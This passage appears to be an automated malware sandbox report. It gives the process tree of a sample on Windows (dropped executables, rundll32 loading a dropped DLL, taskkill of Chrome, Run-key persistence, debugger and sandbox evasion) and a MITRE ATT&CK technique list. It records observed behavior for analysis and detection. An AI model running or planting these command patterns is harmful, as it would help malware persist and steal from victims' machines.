        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 900
        7⤵
        Program crash
        
        PID:5300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4140
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4120
- C:\Users\Admin\AppData\Local\Temp\16C5.exe
  C:\Users\Admin\AppData\Local\Temp\16C5.exe
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4920
- C:\Users\Admin\AppData\Local\Temp\28F6.exe
  C:\Users\Admin\AppData\Local\Temp\28F6.exe
  2⤵
  - Executes dropped EXE
  PID:6632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2624
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:7072

C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun05d60bc3b96248e5.exe
Sun05d60bc3b96248e5.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:5832

C:\Users\Admin\AppData\Local\Temp\7zS89D5C7D3\Sun050462125c7d35.exe
Sun050462125c7d35.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4332
- C:\ProgramData\491252.exe
  "C:\ProgramData\491252.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4256
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    - Executes dropped EXE
    PID:2696
- C:\ProgramData\2257784.exe
  "C:\ProgramData\2257784.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 5088 -s 1964
    3⤵
    - Program crash
    PID:5272
- C:\ProgramData\162210.exe
  "C:\ProgramData\162210.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1068
- C:\ProgramData\3918119.exe
  "C:\ProgramData\3918119.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4308

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4380
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4896

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5484
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6064

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
PID:4672

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
PID:4824

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5540

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6768
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4D4057F44656FAC5CC1EA17B804257AC C
  2⤵
  - Loads dropped DLL
  PID:5848
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1A075E8D96F0B137AE0AB50027D55ED4
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:6572
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:6860
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 22459F4DE6807D86866D167AE5B8209B E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5436

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:6920

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5184
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6332

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
1⤵
PID:1524
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
  2⤵
  - Modifies system executable filetype association
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID:5148
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe
    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    PID:5868

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2000

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6312

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6568

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"
1⤵
PID:376

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:5912

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3572

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2280

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6136

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4268

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

System Information Discovery